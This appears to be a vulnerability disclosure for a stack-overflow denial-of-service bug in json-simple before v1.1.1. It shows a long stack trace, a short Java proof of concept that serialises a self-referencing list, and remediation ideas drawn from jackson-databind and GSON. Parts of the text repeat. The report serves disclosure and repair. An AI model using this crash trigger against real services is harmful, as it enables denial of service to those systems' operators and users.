Stack overflow error caused by json-simple serialization List
Description
json-simple before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.lang.StringBuffer.<init>(StringBuffer.java:131)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:76)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
import org.json.simple.JSONValue;
import java.util.ArrayList;
public class PoC3 {
public static void main(String[] args) {
ArrayList<Object> list = new ArrayList<>();
list.add(list);
JSONValue.toJSONString(list);
}
}
Stack overflow error caused by json-simple serialization List
Description
json-simple before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
PoC
Rectification Solution
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))
References